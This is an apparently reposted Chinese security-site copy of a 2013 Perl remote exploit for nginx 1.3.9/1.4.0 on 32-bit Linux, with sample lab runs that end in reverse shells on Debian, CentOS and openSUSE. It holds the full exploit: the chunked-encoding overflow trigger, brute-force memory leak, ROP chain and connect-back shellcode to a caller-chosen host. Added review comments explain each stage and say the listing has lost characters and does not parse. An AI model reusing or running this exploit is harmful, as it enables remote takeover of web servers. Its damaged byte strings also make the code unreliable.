测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- #nginx 1.3.9/1.4.0 x86 brute force remote exploit
- # copyright (c) 2013 kingcope
- #----------------------------
- #fix for internet exploitation, set MTU:
- #ifconfig <interface> mtu 60000 up
- #
- ###
- # !!! WARNING !!!
- # this exploit is unlikely to succeed when used against remote internet hosts.
- # the reason is that nginx uses a non-blocking read() at the remote connection,
- # this makes exploitation of targets on the internet highly unreliable.
- # (it has been tested against a testbed on the internet but I couldn't exploit
- # any other box with it. required was the above ifconfig setting on the client.
- # maybe enabling large tcp frame support on a gigabit connection is more
- # useful)
- # so use it inside intranets only (duh!), this remains a PoC for now :D
- # The exploit does not break stack cookies but makes use of a reliable method
- # to retrieve all needed offsets for Linux x86 and pop a shell.
- ###
- #TODO
- #*cleanup code
- #*implement stack cookie break and amd64 support
- #*support proxy_pass directive
- ###
- =for comment
- TARGET TESTS (Debian,Centos,OpenSuSE)
- 1.Debian7
- perl ngxunlock.pl 192.168.27.146 80 192.168.27.146 443
- Testing if remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049c50,5184 align % SURVIVED %
- Extracting memory
- bin search done, read 20480 bytes
- exact align found 5184
- Finding exact library addresses
- trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80 % FOUND exact ioctl 0x08049a30 %
- trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890 % FOUND exact memset 0x08049ce0 %
- trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40 % FOUND exact mmap64 0x08049d50 %
- Found library offsets, determining mnemonics
- trying 0x0804ed2d% SURVIVED %
- exact large pop ret 0x0804a7eb
- exact pop x3 ret 0x0804a7ee
- bin search done|
- See reverse handler for success
- nc -v -l -p 443
- listening on [any]443...
- 192.168.27.146: inverse host lookup failed:Unknown host
- connect to [192.168.27.146]from(UNKNOWN)[192.168.27.146]34778
- uname -a;id;
- Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- cat /etc/debian_version
- 7.1
- 2.CentOS6.4
- perl ngxunlock.pl 192.168.27.129 80 192.168.27.129 443
- Testing if remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5194 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5194 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049990,5200 align % SURVIVED %
- Extracting memory /
- bin search done, read 20480 bytes
- exact align found 5200
- Finding exact library addresses
- trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0 % FOUND exact memset 0x080499f0 %
- trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0 % FOUND exact ioctl 0x08049b50 %
- trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0 % FOUND exact mmap64 0x08049f10 %
- Found library offsets, determining mnemonics
- trying 0x0804e9d4% SURVIVED %
- exact large pop ret 0x0806194d
- exact pop x3 ret 0x0804a832
- bin search done/
- See reverse handler for success
- nc -v -l 443
- Connection from 192.168.27.129 port 443 [tcp/https] accepted
- uname -a;id;
- Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
- uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
- cat /etc/redhat*
- CentOS release 6.4(Final)
- 3.OpenSuSE12.1
- perl ngxunlock.pl 192.168.27.135 80 192.168.27.135 443
- Testing if remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049a18,5184 align % SURVIVED %
- Extracting memory
- bin search done, read 20480 bytes
- exact align found 5184
- Finding exact library addresses
- trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0 % FOUND exact memset 0x08049a68 %
- trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160 % FOUND exact ioctl 0x08049b88 %
- trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0 % FOUND exact mmap64 0x08049ee8 %
- Found library offsets, determining mnemonics
- trying 0x0804ea7f% SURVIVED %
- exact large pop ret 0x0804a7fa
- exact pop x3 ret 0x0804a101
- bin search done-
- See reverse handler for success
- Connection from 192.168.27.135 port 443 [tcp/https] accepted
- uname -a;id;
- Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux
- uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup)
- cat /etc/SuSE-*
- openSUSE
- VERSION =12.1
- openSUSE 12.1(i586)
- VERSION =12.1
- CODENAME =Asparagus
- =cut
- # Main flow of the PoC.  It is one flat script; control moves between the
- # labelled stages with goto:
- #   1. probe    - does a malformed chunked request make the worker drop the
- #                 connection without answering?
- #   2. align    - estimate, then pin down, the padding length that reaches
- #                 the saved return address
- #   3. leak     - brute-force the address of write@plt and have the server
- #                 send its own text segment back over fd 3
- #   4. resolve  - locate mmap64/memset/ioctl via PLT stub -> GOT -> libc
- #                 prologue match
- #   5. gadgets  - pick pop/ret sequences out of the leaked text
- #   6. payload  - map an rwx page, copy the connect-back code in, jump
- # Everything here assumes a non-PIE 32-bit binary at 0x08048000 (see the
- # hard-coded scan ranges) and a worker that keeps the client on fd 3; the
- # header comment already notes that amd64 is unsupported.
- # NOTE(review): no `use strict`/`use warnings`, so every variable is a
- # package global.  The listing as printed has also lost characters in
- # transit and does not parse as shown - do not lift byte patterns from it
- # verbatim into detection signatures.
- use IO::Socket;
- # Usage check: all four positional arguments are mandatory.
- if($#ARGV < 3) {
- print"nginx remote exploit ";
- print"copyright (c) 2013 kingcope ";
- print"usage: $0 <target> <target port> <reverse ip> <reverse port> ";
- exit;
- }
- $target = $ARGV[0];
- $targetport = $ARGV[1];
- $cbip = $ARGV[2];
- $cbport = $ARGV[3];
- #linux reverse shell by bighawk
- # Connect-back payload.  The 4 bytes at offset 31 ("# IP") and the 2 bytes
- # at offset 37 ("# PORT") are overwritten below with the caller's values.
- $lnxcbsc =
- "x31xc0x31xdbx31xc9xb0x46xcdx80x90x90x90x6ax66x58x6ax01x5b"
- ."x31xc9x51x6ax01x6ax02x89xe1xcdx80x68"
- ."x7fx7fx7fx7f"# IP
- ."x66x68"."xb0xef"# PORT
- ."x66x6ax02x89xe1x6ax10x51x50x89xe1x89xc6x6ax03x5bx6ax66"
- ."x58xcdx80x87xf3x6ax02x59xb0x3fxcdx80x49x79xf9xb0x0bx31xd2"
- ."x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80";
- # gethostbyname() in scalar context yields the packed 4-byte address;
- # split(//) turns it into single characters for the substr() patch.
- ($a1, $a2, $a3, $a4)= split(//, gethostbyname("$cbip"));
- substr($lnxcbsc,31,4, $a1 . $a2 . $a3 . $a4);
- # pack("s") is host order; reverse() flips it to the network order the
- # payload expects.
- ($p1, $p2)= split(//, reverse(pack("s", $cbport)));
- $p1 = chr(ord($p1));
- $p2 = chr(ord($p2));
- substr($lnxcbsc,37,2, $p1 . $p2);
- # Unbuffered STDOUT so the progress output (and twinkle()) shows up live.
- $|=1;
- $uri="";
- ###test target vulnerable
- #XXX
- #$k = 0x80498d0;
- #$align2 = 5200;
- #$alignplus=0;
- #goto debug;
- print"Testing if remote httpd is vulnerable ";
- $uritested =0;
- # Stage 1: probe.  A second pass is made with $uri set to "50x.html" if
- # the first one with an empty URI produced nothing.
- test:
- goto l;
- # Connect failure handler for the probe loop: give up on the very first
- # attempt ($j==0), otherwise retry the current iteration.
- connecterr:
- if($j==0){
- print" Destination host unreachable ";
- exit;
- }
- goto again;
- l:
- for($j=0;$j<15;$j++){
- again:
- # `|| {goto connecterr}` is presumably meant as "on failure jump to the
- # handler"; the braces make it an anonymous block/hash after ||.
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto connecterr};
- # Large send buffer; the header comment ties this to the MTU requirement.
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- # The trigger request: HEAD with Transfer-Encoding: chunked, padded with
- # "0" to 1024 bytes minus the 16-hex-digit chunk-size line.  A chunk size
- # this large (top bit set) is never legitimate traffic and is the most
- # specific thing to match on the wire.
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: close "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- # Marker value written where the return address is expected to land.
- $stack = pack("V",0xc0debabe);
- twinkle();
- print $sock $req;
- # The body goes out as TCP urgent data (MSG_OOB) in one shot.
- send($sock,"A" x (5555-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- close($sock);
- twinkle();
- # A normal status line means the server coped - try again.
- if($buffer =~/HTTP/1.1/){
- next;
- }
- # No data at all is taken as the worker having died (presumably a SEGV
- # and a worker respawn on the server side).
- if($l <=0){
- print"% SEGV % ";
- print"YES % ";
- goto yes;
- }
- }
- if($uritested ==0){
- $uri ="50x.html";
- $uritested=1;
- goto test;
- }
- # Not vulnerable (or not reachable in the way the PoC needs): dump the
- # server's reply to a keep-alive variant for debugging, then stop.
- print" \\ NO % ";
- print"\\ Try to increase client MTU with ifconfig <interface> mtu 60000 up \\ Debug output ";
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto connecterr};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="GET / HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- send($sock,"A" x (5555-1024). $stack, MSG_OOB);
- $line =0;
- # NOTE(review): $line is never incremented, so the 30-line cap is
- # ineffective; the loop ends only when the server closes the connection.
- while(<$sock>){
- print;
- if($line >30){
- last;
- }
- }
- exit;
- ###find align
- # Stage 2: align.  Coarse scan in steps of 100 first; the first length
- # that kills the worker gives $alignstart for the fine scan below.
- # $verifyalign makes the whole stage run twice and compare results.
- $verifyalign =0;
- yes:
- print"Finding align distance (estimate) ";
- for($align=4050;$align<6000;$align+=100){
- for($j=0;$j<15;$j++){
- printf("testing %d align ",$align);
- again0_1:
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again0_1};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again0_1};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- # Same request as the probe, but the padding length is now the variable.
- send($sock,"A" x ($align-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- twinkle();
- close($sock);
- if($l <=0){
- # A crash at the very first length means the estimate range is wrong.
- if($align ==4050){
- gotoout;
- }
- print" % SEGV % ";
- $alignstart = $align-100;
- goto incalign;
- }
- print" ";
- if($buffer =~/HTTP/1.1/){
- next;
- }
- close($sock);
- }
- }
- out:
- print" \\ Align not found ";
- exit;
- # Fine scan: one byte at a time from $alignstart, 7 tries per length.
- incalign:
- for($align=$alignstart;$align<6000;$align++){
- for($j=0;$j<7;$j++){
- printf("testing %d align ",$align);
- again0_2:
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again0_2};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again0_2};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- twinkle();
- close($sock);
- if($l <=0){
- print" % SEGV % ";
- # First hit: remember it and rerun the whole stage from `yes:`.
- if($verifyalign ==0){
- print"Verifying align ";
- $verifyalign = $align;
- goto yes;
- }
- # Second hit: both runs must agree within 4 bytes; keep the smaller.
- if(($align > $verifyalign +4)||($align < $verifyalign -4)){
- print"\\ Align and verfied align do not match ";
- exit;
- }
- if($verifyalign < $align){
- $align = $verifyalign;
- }
- gotobegin;
- }
- print" ";
- if($buffer =~/HTTP/1.1/){
- next;
- }
- close($sock);
- }
- }
- print" \\ could not find align value. bailing out";
- exit;
- ###find write offset
- # Stage 3: leak.  Walk candidate addresses in the binary's PLT region
- # (hard-coded for a non-PIE image at 0x08048000), 4 bytes at a time, and
- # for each one try 7 small adjustments of the padding length.  The
- # overwritten return address is the guess for write@plt, followed by a
- # fake frame: dummy return, fd 3, buffer = guess-0x1000, length.
- begin:
- print"Finding write offset, determining exact align ";
- $align2 = $align;
- $ok =0;
- #for ($k=0x8049d30;$k<=0x0804FFFF;$k+=4) {
- for($k=0x08049800;$k<=0x0804FFFF;$k+=4){
- #for ($k=0x0804dc00;$k<=0x0804FFFF;$k+=4) {
- for($alignplus=0;$alignplus<7;$alignplus++){
- debug:
- for($j=0;$j<10;$j++){
- # Candidates whose little-endian bytes contain 0x20 are skipped -
- # presumably because a space would break request parsing.
- if(pack("V", $k)=~/x20/){
- next;
- }
- $align = $align2 + $alignplus;
- printf("testing 0x%08x, %d align ",$k,$align);
- again1:
- # if ($ok==0) {
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again1};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- # }
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again1};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- # $k = 0x8049e30; #XXX
- # fd 3 is assumed to be the client connection inside the worker;
- # that holds only if nothing else is open ahead of it - TODO confirm.
- $stack = pack("V", $k)# write plt assumed,eg 0x804ab6c
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $k-0x1000)# write buffer
- ."xffxffxf0x00";# write size
- #$p = <stdin>;
- print $sock $req;
- # Before the hit ($ok==0) more trailing filler is sent than after it.
- if($ok ==0){
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- }else{
- send($sock,"A" x ($align-1024). $stack ."A" x 500, MSG_OOB);
- }
- $l = read($sock, $buffer,0x5000);
- twinkle();
- close($sock);
- #0x8049c50
- # An HTTP reply means the guess was not write@plt (or, once a hit was
- # seen, that this retry failed - go round again).
- if($buffer =~/HTTP/1.1/){
- if($ok ==0){
- print" ";
- next;
- }else{
- goto again1;
- }
- }
- if($ok ==1&& length($buffer)<0x2000){
- goto again1;
- }
- # More than 350 bytes that are not an HTTP reply: the server wrote its
- # own memory back.  First time: mark the hit and repeat to collect a
- # full dump; second time: proceed with $buffer as the leaked image.
- if(length($buffer)>350){
- if($ok ==0){
- $ok =1;
- print" % SURVIVED % ";
- print("Extracting memory ");
- goto again1;
- }
- print" bin search done, ";
- printf("read %d bytes ", $l);
- goto hit;
- }
- print" ";
- }
- }
- }
- print" \\unable to get write offset ";
- exit;
- # Stage 4: resolve.  $write is write@plt; $writeless is the address the
- # leaked $buffer starts at, so buffer offsets map back to addresses.
- hit:
- printf("exact align found %d ", $align);
- print"Finding exact library addresses ";
- $write = $k;
- $writeless = $write-0x1000;
- ### find offsets for mmap64, memset and ioctl
- $mmap64 ="";
- $ioctl ="";
- $memset ="";
- # Byte patterns of the first instructions of the three libc functions
- # the payload needs.  The bytes read back at each resolved address are
- # compared against these; memset has four variants (presumably for
- # different libc builds).
- $mmap64_prefix =
- "x55x53x56x57x8bx54x24x28"
- ."x8bx4cx24x2cxf7xc2xffx0f"
- ."x00x00x75";
- $ioctl_prefix =
- "x53x8bx54x24x10x8bx4cx24"
- ."x0cx8bx5cx24x08xb8x36x00"
- ."x00x00";
- $memset_prefix =
- "x53x8bx4cx24x10x0fxb6x44"
- ."x24x0cx88xc4x89xc2xc1xe0"
- ."x10x09xd0x8bx54x24x08x83";
- $memset_prefix2 =
- "xfcx57x8bx54x24x08x8bx4c"
- ."x24x10x0fxb6x44x24x0cxe3"
- ."x2cx89xd7x83xe2x03x74x11";
- $memset_prefix3 =
- "x57x8bx7cx24x08x8bx54x24"
- ."x10x8ax44x24x0cx88xc4x89"
- ."xc1xc1xe0x10x66x89xc8xfc";
- $memset_prefix4 =
- "x55x89xe5x57x56x83xecx04".
- "x8bx75x08x0fxb6x55x0cx8b".
- "x4dx10x89xf7x89xd0xfcx83";
- # $buffer3 keeps the full leak; $buffer2 is the shrinking search window.
- $buffer2 = $buffer;
- $buffer3 = $buffer;
- plt_again:
- $buffer2 = $buffer3;
- for(;;){
- # "ff 25" is the opcode of the indirect jmp that starts a PLT stub;
- # each occurrence is a candidate PLT entry.
- $i = index($buffer2,"xffx25");
- if($i >=0){
- if(($j = index($buffer3, substr($buffer2, $i,50)))<=0){
- $buffer2 = substr($buffer2, $i+2);
- next;
- }
- $buffer2 = substr($buffer2, $i+2);
- $address = $writeless + $j;
- ### delve into library function
- printf "trying plt 0x%08x, ",($address+2);
- again2:
- # Step 1: read 0x300 bytes at the stub's jmp operand (address+2); the
- # first dword is the GOT slot address.
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again2};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $address+2)# write buffer
- ."x00x03x00x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- $l = read($sock, $buffer,0x300);
- if($buffer =~/HTTP/1.1/){
- goto again2;
- }
- if($l ==0x300){
- $gotentry = unpack("V", substr($buffer,0,4));
- if($gotentry ==0){
- print" ";
- next;
- }
- close($sock);
- }else{
- close($sock);
- goto again2;
- }
- printf "got 0x%08x, ", $gotentry;
- again3:
- # Step 2: read the GOT slot; its first dword is the resolved function.
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again3};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $gotentry)# write buffer
- ."x00x03x00x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- $l = read($sock, $buffer,0x300);
- close($sock);
- if($buffer =~/HTTP/1.1/){
- goto again3;
- }
- if($l ==0x300){
- $function = unpack("V", substr($buffer,0,4));
- }else{
- goto again3;
- }
- if($function ==0){
- print" ";
- next;
- }
- printf "function 0x%08x ", $function;
- again4:
- # Step 3: read 0x500 bytes of the function itself for prologue matching.
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again4};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $function)# write buffer
- ."xffxffxf0x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- #$p = <stdin>;
- $l = read($sock, $buffer,0x500);
- close($sock);
- if($buffer =~/HTTP/1.1/){
- goto again4;
- }
- if($l !=0x500){
- goto again4;
- }
- ###
- # What is recorded is the PLT address ($address), not the libc
- # address, so the later chain calls through the stub.
- if(substr($buffer,0, length($mmap64_prefix)) eq
- $mmap64_prefix){
- $mmap64 = $address;
- printf(" %% FOUND exact mmap64 0x%08x %% ", $mmap64);
- }
- if((substr($buffer,0, length($memset_prefix)) eq
- $memset_prefix)or
- (substr($buffer,0, length($memset_prefix2)) eq
- $memset_prefix2)or
- (substr($buffer,0, length($memset_prefix3)) eq
- $memset_prefix3)or
- (substr($buffer,0, length($memset_prefix4)) eq
- $memset_prefix4)){
- $memset = $address;
- printf(" %% FOUND exact memset 0x%08x %% ", $memset);
- }
- if(substr($buffer,0, length($ioctl_prefix)) eq
- $ioctl_prefix){
- $ioctl = $address;
- printf(" %% FOUND exact ioctl 0x%08x %% ", $ioctl);
- }
- if(($mmap64 ne "")and($memset ne "")and($ioctl ne "")){
- goto gotplt;
- }
- print" ";
- }else{
- last;
- }
- }
- # Ran out of "ff 25" hits without all three: start the scan over.
- print" Finding exact library addresses ";
- goto plt_again;
- # Stage 5: gadgets.  First a pop-pop-pop-ret is needed as the return
- # address after ioctl(); candidates are tried live, starting 0x5000
- # past write@plt, until one survives.  Each try also dumps 0xffff bytes
- # from $write for the regex searches below.
- gotplt:
- print"Found library offsets, determining mnemonics ";
- ### find pop pop pop ret
- ### to set socket blocking
- for($k=$write +0x5000;;$k++){
- printf("trying 0x%08x ",$k);
- again5:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again5};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- # Frame 1: ioctl(3, 0x5421 (FIONBIO), &zero) with 0x08048008 used as a
- # pointer to a zero dword, per the author's "set socket blocking" note.
- # Frame 2: write(3, $write, 0xffff).
- $stack = pack("V", $ioctl)
- . pack("V", $k)# pop pop pop ret assumed
- ."x03x00x00x00"
- ."x21x54x00x00"
- ."x08x80x04x08"# null byte
- . pack("V", $write)# write plt found
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $write)# write buffer
- ."xffxffx0fx00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- #$p = <stdin>;
- $l = read($sock, $buffer,0xfffff);
- close($sock);
- twinkle();
- # NOTE(review): `again5;` is a bare word, not a goto - this branch is a
- # no-op and an HTTP reply falls through to the length check.
- if($buffer =~/HTTP/1.1/){
- again5;
- }
- if($l >0xfff){
- print" % SURVIVED % ";
- close($sock);
- goto hit2;
- }
- print" ";
- next;
- }
- hit2:
- ###send attack buffer
- ###find largepopret
- # "add esp,0x20; pop; pop; pop; ret" - used right after mmap64() to step
- # over its seven arguments and the $popblock.
- @matches= $buffer =~/(x83xc4x20[x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d]xc3)/g;
- foreach $m (@matches){
- $i = index($buffer, $m);
- twinkle();
- print" ";
- if($i >=0){
- $__largepopret = $write + $i;
- printf("exact large pop ret 0x%08x ", $__largepopret);
- goto hit3;
- }
- }
- print"\\ large pop ret not found ";
- exit;
- hit3:
- ###find poppoppopret
- # "pop; pop; pop; ret" - steps over memset()'s three arguments.
- @matches= $buffer =~/([x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d]xc3)/g;
- foreach $m (@matches){
- $i = index($buffer, $m);
- if($i >=0){
- $__poppoppopret = $write + $i;
- printf("exact pop x3 ret 0x%08x ", $__poppoppopret);
- goto attack;
- }
- }
- print"\\ poppoppopret not found ";
- exit;
- # Stage 6: payload.
- attack:
- $largepopret = pack("V", $__largepopret);
- $popblock ="x00x00x00x00"
- ."x00x00x00x00"
- ."x00x00x00x00"
- ."x00x00x00x00";
- $popret = pack("V", $__poppoppopret+2);
- $poppoppopret = pack("V", $__poppoppopret);
- $pop3ret = $__poppoppopret;
- # Stub that is written into the new page: copies a block from the stack
- # to 0x10000100 and falls into it.
- $copycode ="xfcx8bxf4xbfx00x01x00x10xb9x00x02x00x00xf3xa4"
- ."xebxff";
- $memsetcode ="";
- $copyaddress =0x10000000;
- # One memset(dst, byte, 1) frame per byte of $copycode, each returning
- # into pop-pop-pop-ret to discard its arguments.
- for($i=0;$i<length($copycode);$i++){
- $byte = substr($copycode, $i,1);
- $memsetcode .= pack("V", $memset)
- . pack("V", $pop3ret)
- . pack("V", $copyaddress)
- . $byte ."x00x00x00"
- ."x01x00x00x00";
- $copyaddress++;
- }
- for($q=0;$q<10;$q++){
- print"bin search done ";
- sleep(1);
- twinkle();
- print" "
- }
- print" ";
- print"See reverse handler for success ";
- again6:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again6};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: close "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- # Final chain: mmap64(0x10000000, 0x1000, prot 7 = rwx, flags 0x32 =
- # MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, fd -1, offset 0), then the memset
- # frames, then a return into the fresh page.  The whole technique
- # depends on being able to obtain a fixed-address rwx anonymous mapping.
- $stack = pack("V", $mmap64)
- . $largepopret
- ."x00x00x00x10"# mmap start
- ."x00x10x00x00"# mmap size
- ."x07x00x00x00"# mmap prot
- ."x32x00x00x00"# mmap flags
- ."xffxffxffxff"# mmap fd
- ."x00x00x00x00"# mmap offset
- ."x00x00x00x00"# mmap offset
- . $popblock
- . $memsetcode
- ."x00x00x00x10"# JUMP TO 0x10000000 (rwxp addr)
- ."x90" x 100. $lnxcbsc;
- #$p = <stdin>;
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- close($sock);
- # NOTE(review): unconditional loop - the final request is resent until
- # the script is killed, as the author's XXX marks.
- goto again6;# XXX
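- my $current = 0;
- # Spinner glyphs, defined once as a file lexical instead of being
- # reassigned into a package array on every call.  The final glyph is a
- # single backslash; the original `"\"` was an unterminated string.
- my @cursors = ( '|', '/', '-', '\\' );
- # Print the next spinner glyph and advance.  Takes no arguments, returns
- # nothing; the only side effect is one character written to STDOUT.
- sub twinkle {
-     print $cursors[$current];
-     # wrap so the sequence is |, /, -, \ repeated indefinitely
-     $current = ( $current + 1 ) % scalar @cursors;
-     return;
- }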